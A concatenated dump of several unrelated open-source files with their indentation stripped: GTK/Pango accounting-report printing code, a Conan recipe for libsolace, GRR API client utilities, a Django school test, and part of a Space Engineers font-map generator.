self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum of previous page"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[2]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.debt_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.credit_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
if page_nr == 0:
remaining = int(self.content[0][3].replace(",", "")) - int(self.content[0][4].replace(",", ""))
if self.content[0][5] == _("deb"):
remaining -= int(self.content[0][6].replace(",", ""))
else:
remaining += int(self.content[0][6].replace(",", ""))
if remaining < 0:
self.diagnose = _("deb")
self.remaining = utility.showNumber(-(remaining))
else:
if remaining == 0:
self.diagnose = _("equ")
else:
self.diagnose = _("cre")
self.remaining = utility.showNumber(remaining)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.diagnose)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.remaining)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[6]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
addh= ROW_HEIGHT + TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 2:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[3].replace(",", ""))
self.credit_sum += int(row[4].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
self.diagnose = self.content[rindex + offset - 1][5]
self.remaining = self.content[rindex + offset - 1][6]
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 2):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[2]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.diagnose)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(self.remaining)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[6]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
# cr.move_to(self.page_margin, addh + ROW_HEIGHT)
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawDocument(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
self.debt_sum = 0
self.credit_sum = 0
addh= TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 2 or dindex == 3:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[4].replace(",", ""))
self.credit_sum += int(row[5].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= 4*(MARGIN + LINE) + self.cols_width[0] + self.cols_width[1] + self.cols_width[2]
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(right_txt, addh)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawTrialReport(self, page_nr):
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
addh= TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh)
cr.line_to(RIGHT_EDGE, addh)
cr.stroke()
def setDrawFunction(self, func):
self.drawfunction = func
def drawTableHeading(self):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADING_HEIGHT = self.heading_height
MARGIN = self.cell_margin
LINE = self.line
cr = self.cairo_context
htop = self.header_height + MARGIN
# #Heading top line
# cr.move_to(self.page_margin, htop)
# cr.line_to(RIGHT_EDGE, htop)
cr.move_to(RIGHT_EDGE, htop)
cr.line_to(RIGHT_EDGE, htop + HEADING_HEIGHT)
#Draw table headings
right_txt = RIGHT_EDGE
dindex = 0
for data in self.heading:
right_txt -= MARGIN+LINE
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
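            # If a heading is wider than its column, split it on whitespace
            # and stack the two words on separate lines of the heading row.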
if (width / pango.SCALE) > self.cols_width[dindex]:
res = data.split()
self.pangolayout.set_text(res[0])
(width, height) = self.pangolayout.get_size()
if (width / pango.SCALE) < self.cols_width[dindex]:
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + (HEADING_HEIGHT/2-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
#
self.pangolayout.set_text(res[1])
(width, height) = self.pangolayout.get_size()
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + ((HEADING_HEIGHT*3)/2-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
else:
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + (HEADING_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, htop)
cr.line_to(right_txt, htop + HEADING_HEIGHT)
dindex += 1
#Heading top line
cr.move_to(right_txt, htop)
cr.line_to(RIGHT_EDGE, htop)
# def dailySpecific(self, pos, page):
# pass
#
# def subjectSpecific(self, pos, page):
# pass
#
# def docSpecific(self, pos, page):
# pass
|
gpl-3.0
| 1,510,233,238,877,947,600 | 42.230024 | 188 | 0.555142 | false |
abbyssoul/libsolace
|
conanfile.py
|
1
|
2675
|
"""Conan recipe package for libsolace
"""
from conans import CMake, ConanFile
from conans.errors import ConanInvalidConfiguration
from conans.model.version import Version
class LibsolaceConan(ConanFile):
name = "libsolace"
description = "High performance components for mission critical applications"
license = "Apache-2.0"
author = "Ivan Ryabov <abbyssoul@gmail.com>"
url = "https://github.com/abbyssoul/conan-%s.git" % name
homepage = "https://github.com/abbyssoul/%s" % name
topics = ("HPC", "High reliability", "P10", "solace", "performance", "c++", "conan")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False]
}
default_options = {"shared": False, "fPIC": True}
generators = "cmake"
build_requires = "gtest/1.10.0"
scm = {
"type": "git",
"subfolder": name,
"url": "auto",
"revision": "auto"
}
@property
def _supported_cppstd(self):
return ["17", "gnu17", "20", "gnu20"]
@property
def _source_subfolder(self):
return self.name
def config_options(self):
compiler_version = Version(str(self.settings.compiler.version))
if self.settings.os == "Windows":
del self.options.fPIC
        # Exclude compilers that claim to support C++17 but do not in practice
if (self.settings.compiler == "gcc" and compiler_version < "7") or \
(self.settings.compiler == "clang" and compiler_version < "5") or \
(self.settings.compiler == "apple-clang" and compiler_version < "9"):
raise ConanInvalidConfiguration("This library requires C++17 or higher support standard. {} {} is not supported".format(self.settings.compiler, self.settings.compiler.version))
        if self.settings.compiler.cppstd and self.settings.compiler.cppstd not in self._supported_cppstd:
raise ConanInvalidConfiguration("This library requires c++17 standard or higher. {} required".format(self.settings.compiler.cppstd))
def _configure_cmake(self):
cmake = CMake(self, parallel=True)
cmake.definitions["PKG_CONFIG"] = "OFF"
cmake.configure(source_folder=self._source_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
def package_info(self):
self.cpp_info.libs = ["solace"]
if self.settings.os == "Linux":
self.cpp_info.libs.append("m")
|
apache-2.0
| 3,942,592,968,079,367,000 | 36.152778 | 186 | 0.634393 | false |
dunkhong/grr
|
api_client/python/grr_api_client/utils.py
|
1
|
6628
|
#!/usr/bin/env python
"""Utility functions and classes for GRR API client library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import time
from future.builtins import map
from google.protobuf import wrappers_pb2
from google.protobuf import symbol_database
from grr_api_client import errors
from grr_response_proto import apple_firmware_pb2
from grr_response_proto import checks_pb2
from grr_response_proto import deprecated_pb2
from grr_response_proto import flows_pb2
from grr_response_proto import jobs_pb2
from grr_response_proto import osquery_pb2
from grr_response_proto import timeline_pb2
from grr_response_proto.api import artifact_pb2
from grr_response_proto.api import client_pb2
from grr_response_proto.api import config_pb2
from grr_response_proto.api import cron_pb2
from grr_response_proto.api import flow_pb2
from grr_response_proto.api import hunt_pb2
from grr_response_proto.api import output_plugin_pb2
from grr_response_proto.api import reflection_pb2
from grr_response_proto.api import stats_pb2
from grr_response_proto.api import user_pb2
from grr_response_proto.api import vfs_pb2
from grr_response_proto.api import yara_pb2
class ProtobufTypeNotFound(errors.Error):
pass
class ItemsIterator(object):
"""Iterator object with a total_count property."""
def __init__(self, items=None, total_count=None):
super(ItemsIterator, self).__init__()
self.items = items
self.total_count = total_count
def __iter__(self):
for i in self.items:
yield i
def __next__(self):
return next(self.items)
# TODO: Compatibility method for Python 2.
def next(self):
return self.__next__()
def MapItemsIterator(function, items):
"""Maps ItemsIterator via given function."""
return ItemsIterator(
items=map(function, items), total_count=items.total_count)
class BinaryChunkIterator(object):
"""Iterator object for binary streams."""
def __init__(self, chunks=None, total_size=None, on_close=None):
super(BinaryChunkIterator, self).__init__()
self.chunks = chunks
self.total_size = total_size
self.on_close = on_close
def Close(self):
if self.on_close:
self.on_close()
self.on_close = None
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def __iter__(self):
for c in self.chunks:
yield c
self.Close()
def __next__(self):
try:
return next(self.chunks)
except StopIteration:
self.Close()
raise
# TODO: Compatibility method for Python 2.
def next(self):
return self.__next__()
def WriteToStream(self, out):
for c in self.chunks:
out.write(c)
self.Close()
def WriteToFile(self, file_name):
with open(file_name, "wb") as fd:
self.WriteToStream(fd)
# Default poll interval in seconds.
DEFAULT_POLL_INTERVAL = 15
# Default poll timeout in seconds.
DEFAULT_POLL_TIMEOUT = 3600
def Poll(generator=None, condition=None, interval=None, timeout=None):
"""Periodically calls generator function until a condition is satisfied."""
if not generator:
raise ValueError("generator has to be a lambda")
if not condition:
raise ValueError("condition has to be a lambda")
if interval is None:
interval = DEFAULT_POLL_INTERVAL
if timeout is None:
timeout = DEFAULT_POLL_TIMEOUT
started = time.time()
while True:
obj = generator()
check_result = condition(obj)
if check_result:
return obj
if timeout and (time.time() - started) > timeout:
raise errors.PollTimeoutError(
"Polling on %s timed out after %ds." % (obj, timeout))
time.sleep(interval)
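

# Illustrative sketch (not part of the original module): Poll can wait for a
# generator-produced value to satisfy a condition, e.g.
#
#   state = {"calls": 0}
#
#   def _bump():
#     state["calls"] += 1
#     return state["calls"]
#
#   Poll(generator=_bump, condition=lambda c: c >= 3, interval=0)  # returns 3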
AFF4_PREFIX = "aff4:/"
def UrnStringToClientId(urn):
"""Converts given URN string to a client id string."""
if urn.startswith(AFF4_PREFIX):
urn = urn[len(AFF4_PREFIX):]
components = urn.split("/")
return components[0]
def UrnStringToHuntId(urn):
"""Converts given URN string to a flow id string."""
if urn.startswith(AFF4_PREFIX):
urn = urn[len(AFF4_PREFIX):]
components = urn.split("/")
if len(components) != 2 or components[0] != "hunts":
raise ValueError("Invalid hunt URN: %s" % urn)
return components[-1]
TYPE_URL_PREFIX = "type.googleapis.com/"
def GetTypeUrl(proto):
"""Returns type URL for a given proto."""
return TYPE_URL_PREFIX + proto.DESCRIPTOR.full_name
def TypeUrlToMessage(type_url):
"""Returns a message instance corresponding to a given type URL."""
if not type_url.startswith(TYPE_URL_PREFIX):
raise ValueError("Type URL has to start with a prefix %s: %s" %
(TYPE_URL_PREFIX, type_url))
full_name = type_url[len(TYPE_URL_PREFIX):]
try:
return symbol_database.Default().GetSymbol(full_name)()
except KeyError as e:
raise ProtobufTypeNotFound(str(e))
def CopyProto(proto):
new_proto = proto.__class__()
new_proto.ParseFromString(proto.SerializeToString())
return new_proto
class UnknownProtobuf(object):
def __init__(self, proto_type, proto_any):
super(UnknownProtobuf, self).__init__()
self.type = proto_type
self.original_value = proto_any
def UnpackAny(proto_any):
try:
proto = TypeUrlToMessage(proto_any.type_url)
except ProtobufTypeNotFound as e:
return UnknownProtobuf(str(e), proto_any)
proto_any.Unpack(proto)
return proto
def RegisterProtoDescriptors(db, *additional_descriptors):
"""Registers all API-releated descriptors in a given symbol DB."""
db.RegisterFileDescriptor(apple_firmware_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(artifact_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(client_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(config_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(cron_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(flow_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(hunt_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(output_plugin_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(reflection_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(stats_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(user_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(vfs_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(yara_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(checks_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(deprecated_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(flows_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(jobs_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(osquery_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(timeline_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(wrappers_pb2.DESCRIPTOR)
for d in additional_descriptors:
db.RegisterFileDescriptor(d)
|
apache-2.0
| -3,259,828,917,412,572,000 | 25.943089 | 77 | 0.724955 | false |
eduvik/django-school-repo
|
django-school-project/school/tests/test_school.py
|
1
|
2760
|
from django.test import TestCase
from school.models import Semester, StaffMember, Department, Subject, SchoolClass, Student, Enrolment
from sync.google_admin import GoogleSync
from django.conf import settings
import datetime
#class SchoolTest(TestCase):
class SchoolTest(TestCase):
def setUp(self):
#import pdb
#pdb.set_trace()
self.google_sync = GoogleSync()
self.sem, c = Semester.objects.get_or_create(number=1, year="2013",
start_date=datetime.date(2013,1,29), end_date=datetime.date(2013,6,7))
self.tch, c = StaffMember.objects.get_or_create(
first_name="John", last_name="Teacher",
email="john.teacher@" + settings.GOOGLE_APPS_DOMAIN,
date_of_birth=datetime.date(1970,3,3), timetable_id="XTCH",
is_current=True,
staff_type="TEA"
)
#self.google_sync.update_google_staff(self.tch)
self.dept, c = Department.objects.get_or_create(name="Test Faculty")
self.subj, c = Subject.objects.get_or_create(code="14XTST", name="Test Subject", faculty=self.dept)
self.cla, c = SchoolClass.objects.get_or_create(code="14XTSTB", name="Test Class B", cycle=self.sem,
teacher=self.tch, subject=self.subj)
self.students = []
for i in range(1,5):
id='XTST%04d' % i
s, c = Student.objects.get_or_create(
first_name="Test%d"%i, last_name="Student%d"%i,
email="%s@%s" % (id, settings.GOOGLE_APPS_DOMAIN),
date_of_birth=datetime.date(2000,3,(i%27)+1), timetable_id=id,
is_current=True,
student_type="STU", year_level="14"
)
#self.google_sync.update_google_student(s)
Enrolment.objects.get_or_create(student=s, school_class=self.cla)
self.students.append(s)
# def test_student_create(self):
# pass
#
# def test_student_update(self):
# pass
#
# def test_student_exit(self):
# pass
#
# def test_staff_create(self):
# pass
#
# def test_staff_update(self):
# pass
#
# def test_staff_exit(self):
# pass
#
# def test_class_create(self):
# pass
|
agpl-3.0
| -2,396,704,660,212,860,000 | 44.262295 | 112 | 0.483696 | false |
zcold/sefontpy
|
sefontmap.py
|
1
|
23407
|
# coding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 by Shuo Li (contact@shuo.li)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
__author__ = 'Shuo Li <contact@shuol.li>'
__version__= '2014-09-27-12:42'
import timeit
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
from os import listdir
from os.path import isfile, join
import copy
import re
import shutil
import xml.etree.ElementTree as ET
import jinja2
# from fontTools.ttLib import TTFont
import PIL
from PIL import ImageFont, ImageDraw
if 'define constants' :
def file_names_in_folder(folder) :
abs_folder = os.path.abspath(folder)
return [ f for f in listdir(abs_folder)
if isfile(join(abs_folder,f)) ]
def get_default_image() :
return PIL.Image.new( 'RGBA', (image_width, image_height) )
if isfile('config.py') :
config_module = __import__( 'config' )
config = config_module.config
else :
  # a font bitmap set has no shadow, so glyph locations stay consistent.
shadow_size = 3
def construct_color(r, g, b) :
rx = hex(r).split('x')[1]
if len(rx) == 1 :
rx = '0' + rx
gx = hex(g).split('x')[1]
if len(gx) == 1 :
      gx = '0' + gx
    bx = hex(b).split('x')[1]
    if len(bx) == 1 :
      bx = '0' + bx
return '#' + rx + gx + bx
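  # e.g. construct_color(214, 244, 255) -> '#d6f4ff' (illustrative comment,
  # not in the original script)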
blue = construct_color(214, 244, 255)
darkblue = construct_color(118, 200, 241)
green = construct_color(101, 181, 91)
red = construct_color(228, 63, 63)
white = construct_color(255, 255, 255)
black = construct_color(0, 0, 0)
shadow_color = construct_color(50, 50, 50)
config = {
'Do not delete this configure file.' : ''
# The base folder of this font map generator.
, 'base folder'
: './'
# The folder stores all TrueType font (.ttf) files.
# The specified folder is relative to this configure file.
# Absolute folder will be base folder + font folder.
, 'font folder'
: 'fonts'
# The Space Engineers (SE) installation path.
, 'space engineer base folder'
: 'C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers'
# Font size in SE
, 'font size'
: 28
# The font priority list, from high to low.
# The bitmap of each character
# is given by the TrueType font (.tff)
# who has a valid bitmap and a highest priority.
, 'font priority list'
: [ ]
# The width of the result .dds image.
, 'image width'
: 1024
# The width of the result .dds image
, 'image height'
: 1024
# output .dds file name prefix
, 'output dds prefix'
: 'FontDataExtra-'
# Original dds file names.
# They are used when
# the user wants to keep the original font bitmaps
# and only construct the characters that
# are not included in the original font bitmaps.
, 'original dds file names'
: [ 'FontData-0.dds' ]
# Predefined colors
, 'predefined colors'
: { 'blue': {
'output' : True,
'color': blue,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'darkblue': {
'output' : True,
'color': darkblue,
'shadow_color': shadow_color,
